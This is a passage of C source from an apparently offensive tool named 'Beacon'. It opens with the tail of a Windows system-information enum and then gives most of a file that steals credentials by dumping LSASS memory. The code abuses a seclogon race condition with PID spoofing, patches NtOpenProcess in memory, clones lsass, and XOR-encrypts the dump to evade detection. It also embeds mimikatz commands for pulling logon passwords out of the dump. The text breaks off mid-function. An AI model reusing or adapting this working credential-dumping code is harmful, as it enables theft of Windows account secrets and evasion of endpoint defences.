// MmQuerySystemVaInformation 436 | SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // since WIN7 // KeQueryLogicalProcessorRelationship 437 | SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] 438 | SystemStoreInformation, // q; s // SmQueryStoreInformation 439 | SystemRegistryAppendString, // 110, s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS 440 | SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege) 441 | SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION 442 | SystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation 443 | SystemNativeBasicInformation, // not implemented 444 | SystemSpare1, // not implemented 445 | SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION 446 | SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation 447 | SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION 448 | SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) 449 | SystemSystemPtesInformationEx, // 120, q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) 450 | SystemNodeDistanceInformation, // q 451 | SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 452 | SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation 453 | SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 454 | SystemSessionBigPoolInformation, // since WIN8 455 | SystemBootGraphicsInformation, 456 | SystemScrubPhysicalMemoryInformation, 457 | SystemBadPageInformation, 458 | SystemProcessorProfileControlArea, 459 | SystemCombinePhysicalMemoryInformation, // 130 460 | SystemEntropyInterruptTimingCallback, 461 | SystemConsoleInformation, 462 | SystemPlatformBinaryInformation, 463 | SystemThrottleNotificationInformation, 464 | SystemHypervisorProcessorCountInformation, 465 | SystemDeviceDataInformation, 466 | SystemDeviceDataEnumerationInformation, 467 | SystemMemoryTopologyInformation, 468 | SystemMemoryChannelInformation, 469 | SystemBootLogoInformation, // 140 470 | SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE 471 | SystemSpare0, 472 | SystemSecureBootPolicyInformation, 473 | SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX 474 | SystemSecureBootInformation, 475 | SystemEntropyInterruptTimingRawInformation, 476 | SystemPortableWorkspaceEfiLauncherInformation, 477 | SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) 478 | SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX 479 | SystemBootMetadataInformation, // 150 480 | SystemSoftRebootInformation, 481 | SystemElamCertificateInformation, 482 | SystemOfflineDumpConfigInformation, 483 | SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION 484 | SystemRegistryReconciliationInformation, 485 | SystemEdidInformation, 486 | SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD 487 | SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION 488 | SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION 489 | SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160 490 | SystemVmGenerationCountInformation, 491 | SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION 492 | SystemKernelDebuggerFlags, 493 | SystemCodeIntegrityPolicyInformation, 494 | SystemIsolatedUserModeInformation, 495 | SystemHardwareSecurityTestInterfaceResultsInformation, 496 | SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION 497 | SystemAllowedCpuSetsInformation, 498 | SystemDmaProtectionInformation, 499 | SystemInterruptCpuSetsInformation, 500 | SystemSecureBootPolicyFullInformation, 501 | SystemCodeIntegrityPolicyFullInformation, 502 | SystemAffinitizedInterruptProcessorInformation, 503 | SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION 504 | MaxSystemInfoClass 505 | } SYSTEM_INFORMATION_CLASS; -------------------------------------------------------------------------------- /Beacon/DunpHash.c: -------------------------------------------------------------------------------- 1 | 2 | #include "windows.h" 3 | #include "stdio.h" 4 | #include 5 | #include 6 | #include "ntdef.h" 7 | #include "Util.h" 8 | 9 | 10 | LPVOID gDumpBuffer = NULL; 11 | DWORD gBytesRead = 0; 12 | #define MAX_LSASS_DMP_SIZE 314572800 13 | 14 | void RestoreOriginalPidTeb(DWORD originalPid, DWORD originalTid); 15 | 16 | BOOL MinidumpCallbackRoutine(PVOID CallbackParam, PMINIDUMP_CALLBACK_INPUT callbackInput, PMINIDUMP_CALLBACK_OUTPUT callbackOutput) { 17 | LPVOID destination = 0, source = 0; 18 | DWORD bufferSize = 0; 19 | 20 | switch (callbackInput->CallbackType) 21 | { 22 | case IoStartCallback: 23 | callbackOutput->Status = S_FALSE; 24 | break; 25 | 26 | // Gets called for each lsass process memory read operation 27 | case IoWriteAllCallback: 28 | callbackOutput->Status = S_OK; 29 | 30 | // A chunk of minidump data that's been jus read from lsass. 31 | // This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it. 32 | // We will simply save it to dumpBuffer. 33 | source = callbackInput->Io.Buffer; 34 | 35 | // Calculate location of where we want to store this part of the dump. 36 | // Destination is start of our dumpBuffer + the offset of the minidump data 37 | destination = (LPVOID)((DWORD_PTR)gDumpBuffer + (DWORD_PTR)callbackInput->Io.Offset); 38 | 39 | // Size of the chunk of minidump that's just been read. 40 | bufferSize = callbackInput->Io.BufferBytes; 41 | gBytesRead += bufferSize; 42 | 43 | RtlCopyMemory(destination, source, bufferSize); 44 | 45 | //printf("[+] Minidump offset: 0x%x; length: 0x%x\n", callbackInput->Io.Offset, bufferSize); 46 | break; 47 | 48 | case IoFinishCallback: 49 | callbackOutput->Status = S_OK; 50 | break; 51 | 52 | default: 53 | return TRUE; 54 | } 55 | return TRUE; 56 | } 57 | 58 | void EnableDebugPrivilege(BOOL enforceCheck) { 59 | HANDLE currentProcessToken = NULL; 60 | OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken); 61 | BOOL setPrivilegeSuccess = SetPrivilege(currentProcessToken, L"SeDebugPrivilege", TRUE); 62 | if (enforceCheck && !setPrivilegeSuccess) { 63 | printf("SetPrivilege failed to enable SeDebugPrivilege. Run it as an Administrator. Exiting...\n"); 64 | exit(-1); 65 | } 66 | CloseHandle(currentProcessToken); 67 | } 68 | 69 | BOOL SetPrivilege(HANDLE hToken, wchar_t* lpszPrivilege, BOOL bEnablePrivilege) 70 | { 71 | TOKEN_PRIVILEGES tp; 72 | PRIVILEGE_SET privs; 73 | LUID luid; 74 | BOOL debugPrivEnabled = FALSE; 75 | if (!LookupPrivilegeValueW(NULL, lpszPrivilege, &luid)) 76 | { 77 | printf("LookupPrivilegeValueW() failed, error %u\n", GetLastError()); 78 | return FALSE; 79 | } 80 | tp.PrivilegeCount = 1; 81 | //tp.Privileges[0].Luid = luid; 82 | memcpy(&tp.Privileges[0].Luid, &luid, sizeof(LUID)); 83 | if (bEnablePrivilege) 84 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 85 | else 86 | tp.Privileges[0].Attributes = 0; 87 | if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) 88 | { 89 | printf("AdjustTokenPrivileges() failed, error %u\n", GetLastError()); 90 | return FALSE; 91 | } 92 | privs.PrivilegeCount = 1; 93 | privs.Control = PRIVILEGE_SET_ALL_NECESSARY; 94 | //privs.Privilege[0].Luid = luid; 95 | memcpy(&privs.Privilege[0].Luid, &luid, sizeof(LUID)); 96 | privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED; 97 | if (!PrivilegeCheck(hToken, &privs, &debugPrivEnabled)) { 98 | printf("PrivilegeCheck() failed, error %u\n", GetLastError()); 99 | return FALSE; 100 | } 101 | if (!debugPrivEnabled) 102 | return FALSE; 103 | return TRUE; 104 | } 105 | DWORD GetPidUsingFilePath(wchar_t* processBinaryPath) { 106 | DWORD retPid = 0; 107 | IO_STATUS_BLOCK iosb; 108 | HANDLE hFile; 109 | PFILE_PROCESS_IDS_USING_FILE_INFORMATION pfpiufi = NULL; 110 | int FileProcessIdsUsingFileInformation = 47; 111 | ULONG pfpiufiLen = 0; 112 | PULONG_PTR processIdListPtr = NULL; 113 | NTSTATUS status = 0; 114 | pNtQueryInformationFile NtQueryInformationFile = (pNtQueryInformationFile)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQueryInformationFile"); 115 | hFile = CreateFile(processBinaryPath, FILE_READ_ATTRIBUTES, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL); 116 | if (hFile != INVALID_HANDLE_VALUE) 117 | { 118 | pfpiufiLen = 8192; 119 | pfpiufi = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pfpiufiLen); 120 | status = NtQueryInformationFile(hFile, &iosb, pfpiufi, pfpiufiLen, (FILE_INFORMATION_CLASS)FileProcessIdsUsingFileInformation); 121 | while (status == STATUS_INFO_LENGTH_MISMATCH) { 122 | pfpiufiLen = pfpiufiLen + 8192; 123 | pfpiufi = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pfpiufi, pfpiufiLen); 124 | status = NtQueryInformationFile(hFile, &iosb, pfpiufi, pfpiufiLen, (FILE_INFORMATION_CLASS)FileProcessIdsUsingFileInformation); 125 | } 126 | processIdListPtr = pfpiufi->ProcessIdList; 127 | // we return only the first pid, it's usually the right one 128 | if (pfpiufi->NumberOfProcessIdsInList >= 1) 129 | retPid = *processIdListPtr; 130 | HeapFree(GetProcessHeap(), 0, pfpiufi); 131 | CloseHandle(hFile); 132 | } 133 | return retPid; 134 | } 135 | 136 | void SpoofPidTeb(DWORD spoofedPid, PDWORD originalPid, PDWORD originalTid) { 137 | CLIENT_ID CSpoofedPid; 138 | DWORD oldProtection, oldProtection2; 139 | *originalPid = GetCurrentProcessId(); 140 | *originalTid = GetCurrentThreadId(); 141 | CLIENT_ID* pointerToTebPid = &(NtCurrentTeb()->ClientId); 142 | CSpoofedPid.UniqueProcess = (HANDLE)spoofedPid; 143 | CSpoofedPid.UniqueThread = (HANDLE)*originalTid; 144 | memcpy(pointerToTebPid, &CSpoofedPid, sizeof(CLIENT_ID)); 145 | } 146 | void FindTokenHandlesInProcess(DWORD targetPid, HANDLE* tokenHandles, PDWORD tokenHandlesLen) 147 | { 148 | PSYSTEM_HANDLE_INFORMATION handleInfo = NULL; 149 | DWORD handleInfoSize = 0x10000; 150 | NTSTATUS status; 151 | ULONG processTypeIndex; 152 | UNICODE_STRING processTypeName = RTL_CONSTANT_STRING(L"Token"); 153 | status = GetTypeIndexByName(&processTypeName, &processTypeIndex); 154 | if (!NT_SUCCESS(status)) { 155 | printf("GetTypeIndexByName failed 0x%08x\n", status); 156 | exit(-1); 157 | } 158 | pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation"); 159 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize); 160 | while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH) 161 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2); 162 | for (DWORD i = 0; i < handleInfo->HandleCount; i++) { 163 | if (handleInfo->Handles[i].ObjectTypeIndex == processTypeIndex && handleInfo->Handles[i].UniqueProcessId == targetPid) { 164 | tokenHandles[*tokenHandlesLen] = (HANDLE)handleInfo->Handles[i].HandleValue; 165 | *tokenHandlesLen = *tokenHandlesLen + 1; 166 | } 167 | } 168 | free(handleInfo); 169 | } 170 | BOOL EnableImpersonatePrivilege() { 171 | HANDLE currentProcessToken = NULL; 172 | OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken); 173 | BOOL setPrivilegeSuccess = SetPrivilege(currentProcessToken, L"SeImpersonatePrivilege", TRUE); 174 | CloseHandle(currentProcessToken); 175 | return setPrivilegeSuccess; 176 | } 177 | void MalSeclogonPPIDSpoofing(int pid, wchar_t* cmdline) 178 | { 179 | PROCESS_INFORMATION procInfo; 180 | STARTUPINFO startInfo; 181 | DWORD originalPid, originalTid; 182 | HANDLE tokenHandles[8192]; 183 | DWORD tokenHandlesCount = 0; 184 | BOOL useCreateProcessWithToken = FALSE; 185 | BOOL processCreatedWithToken = FALSE; 186 | EnableDebugPrivilege(FALSE); 187 | SpoofPidTeb((DWORD)pid, &originalPid, &originalTid); 188 | RtlZeroMemory(&procInfo, sizeof(PROCESS_INFORMATION)); 189 | RtlZeroMemory(&startInfo, sizeof(STARTUPINFO)); 190 | if (EnableImpersonatePrivilege()) { 191 | FindTokenHandlesInProcess(pid, tokenHandles, &tokenHandlesCount); 192 | if (tokenHandlesCount < 1) { 193 | printf("No token handles found in process %d, can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...\n", pid); 194 | useCreateProcessWithToken = FALSE; 195 | } 196 | else 197 | useCreateProcessWithToken = TRUE; 198 | } 199 | else { 200 | printf("Impersonation privileges not available, can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...\n"); 201 | useCreateProcessWithToken = FALSE; 202 | } 203 | if (useCreateProcessWithToken) { 204 | for (DWORD i = 0; i < tokenHandlesCount; i++) { 205 | if (CreateProcessWithTokenW(tokenHandles[i], 0, NULL, cmdline, 0, NULL, NULL, &startInfo, &procInfo)) { 206 | processCreatedWithToken = TRUE; 207 | break; 208 | } 209 | } 210 | if (processCreatedWithToken) { 211 | // the returned handles in procInfo are wrong and duped into the spoofed parent process, so we can't close handles or wait for process end. 212 | printf("Spoofed process %S created correctly as child of PID %d using CreateProcessWithTokenW()!", cmdline, pid); 213 | } 214 | else { 215 | printf("CreateProcessWithTokenW() failed with error code %d \n", GetLastError()); 216 | } 217 | } 218 | else { 219 | if (!CreateProcessWithLogonW(L"MalseclogonUser", L"MalseclogonDomain", L"MalseclogonPwd", LOGON_NETCREDENTIALS_ONLY, NULL, cmdline, 0, NULL, NULL, &startInfo, &procInfo)) { 220 | printf("CreateProcessWithLogonW() failed with error code %d \n", GetLastError()); 221 | 222 | } 223 | else { 224 | // the returned handles in procInfo are wrong and duped into the spoofed parent process, so we can't close handles or wait for process end. 225 | printf("Spoofed process %S created correctly as child of PID %d using CreateProcessWithLogonW()!", cmdline, pid); 226 | } 227 | } 228 | RestoreOriginalPidTeb(originalPid, originalTid); 229 | } 230 | 231 | DWORD WINAPI ThreadSeclogonLock(LPVOID lpParam) { 232 | THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam; 233 | MalSeclogonPPIDSpoofing(thread_params->pid, thread_params->cmdline); 234 | return 0; 235 | } 236 | 237 | // credits to @tirannido 238 | // took from --> https://github.com/googleprojectzero/symboliclink-testing-tools/blob/main/CommonUtils/FileOpLock.cpp 239 | void CreateFileLock(HANDLE hFile, LPOVERLAPPED overlapped) { 240 | REQUEST_OPLOCK_INPUT_BUFFER inputBuffer; 241 | REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer; 242 | inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 243 | inputBuffer.StructureLength = sizeof(inputBuffer); 244 | inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; 245 | inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; 246 | outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 247 | outputBuffer.StructureLength = sizeof(outputBuffer); 248 | DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK, &inputBuffer, sizeof(inputBuffer), &outputBuffer, sizeof(outputBuffer), NULL, overlapped); 249 | DWORD err = GetLastError(); 250 | if (err != ERROR_IO_PENDING) { 251 | printf("Oplock Failed %d\n", err); 252 | exit(-1); 253 | } 254 | } 255 | 256 | void LeakLsassHandleInSeclogonWithRaceCondition(DWORD lsassPid) { 257 | wchar_t fileToLock[] = L"C:\\Windows\\System32\\license.rtf"; 258 | OVERLAPPED overlapped; 259 | DWORD dwBytes; 260 | THREAD_PARAMETERS thread_params; 261 | HANDLE hFile = CreateFile(fileToLock, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL); 262 | overlapped.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); 263 | CreateFileLock(hFile, &overlapped); 264 | thread_params.pid = lsassPid; 265 | thread_params.cmdline = fileToLock; 266 | // we need to run CreateProcessWithToken() in a separate thread because the file lock would also lock our thread 267 | CreateThread(NULL, 0, ThreadSeclogonLock, (LPVOID)&thread_params, 0, NULL); 268 | // this call will halt the current thread until someone will access the locked file. We expect seclogon trying to access license.rtf when calling CreateProcessAsUser() 269 | if (!GetOverlappedResult(hFile, &overlapped, &dwBytes, TRUE)) { 270 | printf("Oplock Failed. Exiting...\n"); 271 | exit(-1); 272 | } 273 | printf("Seclogon thread locked. A lsass handle will be available inside the seclogon process!\n"); 274 | 275 | 276 | } 277 | 278 | void RestoreOriginalPidTeb(DWORD originalPid, DWORD originalTid) { 279 | CLIENT_ID CRealPid; 280 | DWORD oldProtection, oldProtection2; 281 | CLIENT_ID* pointerToTebPid = &(NtCurrentTeb()->ClientId); 282 | CRealPid.UniqueProcess = (HANDLE)originalPid; 283 | CRealPid.UniqueThread = (HANDLE)originalTid; 284 | memcpy(pointerToTebPid, &CRealPid, sizeof(CLIENT_ID)); 285 | } 286 | 287 | BOOL FileExists(LPCTSTR szPath) 288 | { 289 | DWORD dwAttrib = GetFileAttributes(szPath); 290 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 291 | } 292 | 293 | NTSTATUS QueryObjectTypesInfo(__out POBJECT_TYPES_INFORMATION* TypesInfo) { 294 | NTSTATUS Status; 295 | ULONG BufferLength = 0x1000; 296 | PVOID Buffer; 297 | pNtQueryObject NtQueryObject = (pNtQueryObject)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQueryObject"); 298 | *TypesInfo = NULL; 299 | do { 300 | Buffer = malloc(BufferLength); 301 | if (Buffer == NULL) 302 | return (NTSTATUS)STATUS_INSUFFICIENT_RESOURCES; 303 | Status = NtQueryObject(NULL, ObjectTypesInformation, Buffer, BufferLength, &BufferLength); 304 | if (NT_SUCCESS(Status)) { 305 | *TypesInfo = Buffer; 306 | return Status; 307 | } 308 | free(Buffer); 309 | } while (Status == STATUS_INFO_LENGTH_MISMATCH); 310 | return Status; 311 | } 312 | 313 | NTSTATUS GetTypeIndexByName(__in PCUNICODE_STRING TypeName, __out PULONG TypeIndex) { 314 | NTSTATUS Status; 315 | POBJECT_TYPES_INFORMATION ObjectTypes; 316 | POBJECT_TYPE_INFORMATION_V2 CurrentType; 317 | *TypeIndex = 0; 318 | pRtlCompareUnicodeString RtlCompareUnicodeString = (pRtlCompareUnicodeString)GetProcAddress(LoadLibrary(L"ntdll.dll"), "RtlCompareUnicodeString"); 319 | Status = QueryObjectTypesInfo(&ObjectTypes); 320 | if (!NT_SUCCESS(Status)) { 321 | printf("QueryObjectTypesInfo failed: 0x%08x\n", Status); 322 | return Status; 323 | } 324 | CurrentType = (POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_FIRST_ENTRY(ObjectTypes); 325 | for (ULONG i = 0; i < ObjectTypes->NumberOfTypes; i++) { 326 | if (RtlCompareUnicodeString(TypeName, &CurrentType->TypeName, TRUE) == 0) { 327 | *TypeIndex = i + 2; 328 | break; 329 | } 330 | CurrentType = (POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_NEXT_ENTRY(CurrentType); 331 | } 332 | if (!*TypeIndex) 333 | Status = STATUS_NOT_FOUND; 334 | free(ObjectTypes); 335 | return Status; 336 | } 337 | 338 | 339 | void FindProcessHandlesInTargetProcess(DWORD targetPid, HANDLE* handlesToLeak, PDWORD handlesToLeakCount) 340 | { 341 | PSYSTEM_HANDLE_INFORMATION handleInfo = NULL; 342 | DWORD handleInfoSize = 0x10000; 343 | NTSTATUS status; 344 | ULONG processTypeIndex; 345 | UNICODE_STRING processTypeName = RTL_CONSTANT_STRING(L"Process"); 346 | status = GetTypeIndexByName(&processTypeName, &processTypeIndex); 347 | if (!NT_SUCCESS(status)) { 348 | printf("GetTypeIndexByName failed 0x%08x\n", status); 349 | exit(-1); 350 | } 351 | pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation"); 352 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize); 353 | while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH) 354 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2); 355 | for (DWORD i = 0; i < handleInfo->HandleCount; i++) { 356 | if (handleInfo->Handles[i].ObjectTypeIndex == processTypeIndex && handleInfo->Handles[i].UniqueProcessId == targetPid) { 357 | handlesToLeak[*handlesToLeakCount] = (HANDLE)handleInfo->Handles[i].HandleValue; 358 | *handlesToLeakCount = *handlesToLeakCount + 1; 359 | } 360 | } 361 | free(handleInfo); 362 | } 363 | 364 | void ReplaceNtOpenProcess(HANDLE leakedHandle, char* oldCode, int* oldCodeSize) { 365 | /* 366 | mov QWORD [rcx], 0xffff 367 | xor rax, rax 368 | ret 369 | */ 370 | char replacedFunc[] = { 0x48, 0xC7, 0x01, 0xFF, 0xFF, 0x00, 0x00, 0x48, 0x31, 0xC0, 0xC3 }; 371 | DWORD oldProtection, oldProtection2; 372 | char* addrNtOpenProcess = (char*)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtOpenProcess"); 373 | // we save old code to restore the original function 374 | *oldCodeSize = sizeof(replacedFunc); 375 | memcpy(oldCode, addrNtOpenProcess, *oldCodeSize); 376 | memcpy((replacedFunc + 3), (WORD*)&leakedHandle, sizeof(WORD)); 377 | VirtualProtect(addrNtOpenProcess, sizeof(replacedFunc), PAGE_EXECUTE_READWRITE, &oldProtection); 378 | memcpy(addrNtOpenProcess, replacedFunc, sizeof(replacedFunc)); 379 | VirtualProtect(addrNtOpenProcess, sizeof(replacedFunc), oldProtection, &oldProtection2); 380 | } 381 | 382 | void RestoreNtOpenProcess(char* oldCode, int oldCodeSize) { 383 | DWORD oldProtection, oldProtection2; 384 | char* addrNtOpenProcess = (char*)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtOpenProcess"); 385 | VirtualProtect(addrNtOpenProcess, oldCodeSize, PAGE_EXECUTE_READWRITE, &oldProtection); 386 | memcpy(addrNtOpenProcess, oldCode, oldCodeSize); 387 | VirtualProtect(addrNtOpenProcess, oldCodeSize, oldProtection, &oldProtection2); 388 | } 389 | 390 | void EncryptAndWriteDumpToDisk(wchar_t* dumpPath, int xorKey) { 391 | HANDLE hDumpFileEncrypted; 392 | DWORD bytesRead, bytesWritten; 393 | char* readBuffer = gDumpBuffer; 394 | bytesRead = gBytesRead; 395 | for (DWORD i = 0; i < bytesRead; i++) 396 | readBuffer[i] = readBuffer[i] ^ (char)xorKey; 397 | 398 | hDumpFileEncrypted = CreateFile(dumpPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 399 | if (hDumpFileEncrypted == INVALID_HANDLE_VALUE) { 400 | printf("Cannot create file %S. Exiting...\n", dumpPath); 401 | exit(1); 402 | } 403 | WriteFile(hDumpFileEncrypted, readBuffer, bytesRead, &bytesWritten, NULL); 404 | CloseHandle(hDumpFileEncrypted); 405 | if (FileExists(dumpPath)) { 406 | unsigned char* add = (unsigned char*)malloc(163); 407 | unsigned char Success[95] = "EncodeData Check the path C:\\lsass.dmp.xor \nDecodeData DumpLsass.exe -t 2 -f lsass.dmp.xor -k "; 408 | memcpy(add, Success, sizeof(Success)); 409 | unsigned char key[4]; // 数字转字符串缓冲区 410 | sprintf(key, "%d", xorKey); // 将整数转换为字符串 411 | memcpy(add + sizeof(Success), key, 4); 412 | unsigned char mikz[64] = "\nsekurlsa::minidump lsass.dmp.xor \nsekurlsa::logonpasswords full"; 413 | memcpy(add + sizeof(Success) + 4, mikz, 64); 414 | DataProcess(add, sizeof(Success) + sizeof(mikz) + 4, 0); 415 | printf("EncodeData Check the path %S\n", dumpPath); 416 | printf("DecodeData DumpLsass.exe -t 2 -f tron.xor -k %d\n", xorKey, xorKey); 417 | } 418 | else 419 | printf("Something went wrong :(\n"); 420 | } 421 | 422 | void MalSeclogonDumpLsassWithSeclogonRaceCondition(int lsassPid, wchar_t* dumpPath, int xorKey) { 423 | PROCESS_INFORMATION procInfo; 424 | STARTUPINFO startInfo; 425 | DWORD originalPid, originalTid; 426 | char oldCode[15]; 427 | int oldCodeSize; 428 | HANDLE handles[8192]; 429 | DWORD handlesCount = 0; 430 | DWORD seclogonPid = 0; 431 | HANDLE hSeclogon, hDupedHandle, hLsassClone; 432 | NTSTATUS status; 433 | MINIDUMP_CALLBACK_INFORMATION callbackInfo; 434 | wchar_t dbgcoreStr[] = { L'd', L'b', L'g', L'c', L'o', L'r', L'e', L'.', L'd', L'l', L'l', 0x00, 0x00 }; 435 | wchar_t ntdllStr[] = { L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', 0x00, 0x00 }; 436 | char MiniDumpWriteDumpStr[] = { 'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p', 0x00 }; 437 | char NtCreateProcessExStr[] = { 'N', 't', 'C', 'r', 'e', 'a', 't', 'e', 'P', 'r', 'o', 'c', 'e', 's', 's', 'E', 'x', 0x00 }; 438 | pMiniDumpWriteDump MiniDumpWriteDumpDyn = (pMiniDumpWriteDump)GetProcAddress(LoadLibrary(dbgcoreStr), MiniDumpWriteDumpStr); 439 | pNtCreateProcessEx NtCreateProcessEx = (pNtCreateProcessEx)GetProcAddress(LoadLibrary(ntdllStr), NtCreateProcessExStr); 440 | EnableDebugPrivilege(TRUE); 441 | seclogonPid = GetPidUsingFilePath(L"C:\\WINDOWS\\system32\\seclogon.dll"); 442 | if (seclogonPid == 0) { 443 | printf("Seclogon service not running, trying to wake-up...\n"); 444 | RtlZeroMemory(&procInfo, sizeof(PROCESS_INFORMATION)); 445 | RtlZeroMemory(&startInfo, sizeof(STARTUPINFO)); 446 | CreateProcessWithTokenW(-1, 0, NULL, L"cmd", 0, NULL, NULL, &startInfo, &procInfo); 447 | // trying again to get the seclogon pid 448 | seclogonPid = GetPidUsingFilePath(L"C:\\WINDOWS\\system32\\seclogon.dll"); 449 | } 450 | SpoofPidTeb((DWORD)lsassPid, &originalPid, &originalTid); 451 | LeakLsassHandleInSeclogonWithRaceCondition((DWORD)lsassPid); 452 | RestoreOriginalPidTeb(originalPid, originalTid); 453 | FindProcessHandlesInTargetProcess(seclogonPid, handles, &handlesCount); 454 | if (handlesCount < 1) { 455 | printf("No process handles found in seclogon. The race condition didn't work.\n"); 456 | exit(-1); 457 | } 458 | if (FileExists(dumpPath)) DeleteFile(dumpPath); 459 | hSeclogon = OpenProcess(PROCESS_DUP_HANDLE, FALSE, seclogonPid); 460 | for (DWORD i = 0; i < handlesCount; i++) { 461 | DuplicateHandle(hSeclogon, handles[i], GetCurrentProcess(), &hDupedHandle, 0, FALSE, DUPLICATE_SAME_ACCESS); 462 | if (GetProcessId(hDupedHandle) == lsassPid) { 463 | status = NtCreateProcessEx(&hLsassClone, MAXIMUM_ALLOWED, NULL, hDupedHandle, 0x1001, NULL, NULL, NULL, FALSE); 464 | if (status != 0) { 465 | printf("NtCreateProcessEx failed with ntstatus 0x%08x", status); 466 | exit(-1); 467 | } 468 | // Set up minidump callback 469 | RtlZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION)); 470 | callbackInfo.CallbackRoutine = &MinidumpCallbackRoutine; 471 | callbackInfo.CallbackParam = NULL; 472 | // init global vars for storing dump in memory 473 | gDumpBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_LSASS_DMP_SIZE); 474 | gBytesRead = 0; 475 | // we ensure no one will close the handle, it seems RtlQueryProcessDebugInformation() called from MiniDumpWriteDump() try to close it 476 | SetHandleInformation(hLsassClone, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE); 477 | // we 